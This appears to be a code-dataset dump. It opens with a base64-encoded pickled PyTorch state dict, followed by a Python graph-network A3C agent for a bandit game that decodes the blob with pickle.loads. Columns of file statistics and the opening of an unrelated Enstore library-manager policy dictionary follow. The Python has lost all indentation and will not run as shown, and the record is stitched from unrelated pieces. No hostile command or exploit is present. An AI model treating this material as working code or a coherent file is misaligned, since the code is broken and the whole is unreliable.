Ty1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+J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'
import base64
import pickle
import torch
from torch import distributions, nn
import torch.nn.functional as F
class FullyConnectedGNNLayer(nn.Module):
def __init__(self, n_nodes, in_features, out_features, activation_func=nn.ReLU(), squeeze_out=False):
super().__init__()
self.n_nodes = n_nodes
self.activation_func = activation_func
self.transform_features = nn.Linear(in_features, out_features)
self.message_passing_mat = nn.Parameter(
(torch.ones((n_nodes, n_nodes)) - torch.eye(n_nodes)) / (n_nodes - 1),
requires_grad=False
)
self.recombine_features = nn.Linear(out_features*2, out_features)
self.squeeze_out = squeeze_out
# Initialize linear layer weights
nn.init.normal_(self.transform_features.weight, mean=0., std=0.2)
nn.init.normal_(self.recombine_features.weight, mean=0., std=0.2)
nn.init.constant_(self.transform_features.bias, 0.)
nn.init.constant_(self.recombine_features.bias, 0.)
def forward(self, features):
features_transformed = self.activation_func(
self.transform_features(features)
)
messages = torch.matmul(self.message_passing_mat, features_transformed)
features_messages_combined = self.activation_func(
self.recombine_features(torch.cat([features_transformed, messages], dim=-1))
)
if self.squeeze_out:
return features_messages_combined.squeeze(dim=-1)
else:
return features_messages_combined
class GraphNN_A3C(nn.Module):
def __init__(self, in_features, n_nodes, n_hidden_layers, layer_sizes,
activation_func = nn.ReLU()):
super().__init__()
# Define network
if type(layer_sizes) == int:
layer_sizes = [layer_sizes] * (n_hidden_layers + 1)
assert len(layer_sizes) == n_hidden_layers + 1, f'len(layer_sizes) must equal n_hidden_layers + 1, was {len(layer_sizes)} but should have been {n_hidden_layers+1}'
layers = [FullyConnectedGNNLayer(n_nodes, in_features, layer_sizes[0], activation_func=activation_func)]
for i in range(n_hidden_layers):
layers.append(FullyConnectedGNNLayer(n_nodes, layer_sizes[i], layer_sizes[i+1], activation_func=activation_func))
self.base = nn.Sequential(*layers)
self.actor = FullyConnectedGNNLayer(n_nodes, layer_sizes[-1], 1, activation_func=activation_func, squeeze_out=True)
self.critic = FullyConnectedGNNLayer(n_nodes, layer_sizes[-1], 1, activation_func=nn.Identity(), squeeze_out=True)
def forward(self, states):
base_out = self.base(states)
return self.actor(base_out), self.critic(base_out).mean(dim=-1)
def sample_action(self, states):
with torch.no_grad():
logits, _ = self.forward(states)
probs = F.softmax(logits, dim=-1)
batch_size, n_envs, n_players, n_bandits = probs.shape
m = torch.distributions.Categorical(probs.view(batch_size * n_envs * n_players, n_bandits))
return m.sample().view(batch_size, n_envs, n_players)
def choose_best_action(self, states):
with torch.no_grad():
logits, _ = self.forward(states)
return logits.argmax(dim=-1)
def loss_func(self, states, actions, v_t):
#print(f'states.shape: {states.shape}, actions.shape: {actions.shape}, v_t.shape: {v_t.shape}')
logits, values = self.forward(states)
#print(f'logits.shape: {logits.shape}, values.shape: {values.shape}')
td = v_t - values
critic_loss = td.pow(2).view(-1)
probs = F.softmax(logits, dim=-1)
batch_size, n_envs, n_players, n_bandits = probs.shape
m = torch.distributions.Categorical(probs.view(batch_size * n_envs * n_players, n_bandits))
#print(f'm.log_prob(actions.view(batch_size * n_envs * n_players)).shape: {m.log_prob(actions.view(batch_size * n_envs * n_players)).shape}, td.shape: {td.shape}')
actor_loss = -(m.log_prob(actions.view(-1)) * td.detach().view(-1))
total_loss = (critic_loss + actor_loss).mean()
return total_loss
class A3C_Agent():
def __init__(self, configuration, serialized_string):
self.n_bandits = configuration.banditCount
self.n_steps = 1999 # TODO: Get this info from configuration somehow?
self.total_reward = 0
self.pull_rewards = torch.zeros((self.n_bandits, 1), dtype=torch.float)
self.player_n_pulls = torch.zeros((self.n_bandits, 2), dtype=torch.float)
state_dict_bytes = base64.b64decode(serialized_string)
state_dicts = pickle.loads(state_dict_bytes)
self.model = GraphNN_A3C(
in_features=3,
n_nodes=self.n_bandits,
n_hidden_layers=3,
layer_sizes=16
)
self.model.load_state_dict(state_dicts['model_state_dict'])
self.model.eval()
def get_obs(self):
# Obs must be of shape (n_batches, n_envs, n_players, n_bandits, n_features
# Since we are only selecting an action for a single agent, this translates to: (1, 1, 1, n_bandits, -1)
return torch.cat([
self.player_n_pulls,
self.pull_rewards
], dim=-1).view(1, 1, 1, self.n_bandits, -1) * self.n_bandits / self.n_steps
def get_action(self, observation):
if observation.step > 0:
# Get r
r = observation.reward - self.total_reward
self.total_reward = observation.reward
# Update pull_rewards and player_n_pulls
opp_last_act = observation.lastActions[not observation.agentIndex]
self.pull_rewards[self.last_act] += r
self.player_n_pulls[self.last_act, 0] += 1
self.player_n_pulls[opp_last_act, 1] += 1
self.last_act = self.model.choose_best_action(self.get_obs()).item()
return self.last_act
curr_agent = None
def agent(observation, configuration):
global curr_agent
if curr_agent is None:
curr_agent = A3C_Agent(configuration, serialized_string)
return curr_agent.get_action(observation)
| 2,466.165517
| 351,299
| 0.93574
| 21,579
| 357,594
| 15.495806
| 0.051578
| 1.669817
| 2.424787
| 3.126465
| 0.900542
| 0.899615
| 0.899277
| 0.8992
| 0.8992
| 0.898697
| 0
| 0.179653
| 0.004248
| 357,594
| 144
| 351,300
| 2,483.291667
| 0.75943
| 0.00179
| 0
| 0.110092
| 0
| 0.018349
| 0.984482
| 0.984124
| 0
| 1
| 0
| 0.006944
| 0.009174
| 1
| 0.100917
| false
| 0.018349
| 0.045872
| 0.009174
| 0.256881
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
f7c9416a6e465da655208b7268be6e523a26f03b
| 25,501
|
py
|
Python
|
etc/stken_policy.py
|
moibenko/enstore
|
6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9
|
[
"Intel",
"Unlicense"
] | 4
|
2021-10-17T11:17:59.000Z
|
2022-02-28T16:58:40.000Z
|
etc/stken_policy.py
|
moibenko/enstore
|
6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9
|
[
"Intel",
"Unlicense"
] | 17
|
2021-10-05T21:44:06.000Z
|
2022-03-31T16:58:40.000Z
|
etc/stken_policy.py
|
moibenko/enstore
|
6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9
|
[
"Intel",
"Unlicense"
] | 8
|
2021-09-02T18:55:49.000Z
|
2022-03-09T21:05:28.000Z
|
# This file contains library manager director policies
policydict = {
'CD-10KCF1.library_manager': {
1: {'rule': {'storage_group': 'lqcd',
'file_family': 'hpqcd',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
2: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-charmonium',
'wrapper': 'cern',
},
'minimal_file_size': 8600000000L,
'resulting_library': 'CD-DiskSF1',
'max_files_in_pack': 10000,
'max_waiting_time': 86400,
},
3: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-charmonium',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library': 'CD-DiskSF1',
'max_files_in_pack': 10000,
'max_waiting_time': 86400,
},
4: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-FNAL-l6496f21b7075m00155m031',
'wrapper': 'cern',
},
'minimal_file_size': 8600000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
5: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-FNAL-l6496f21b7075m00155m031',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
6: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-FNAL-HISQ',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
7: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-FNAL-HISQ',
'wrapper': 'cern',
},
'minimal_file_size': 8600000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
8: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-hotqcdhisq',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
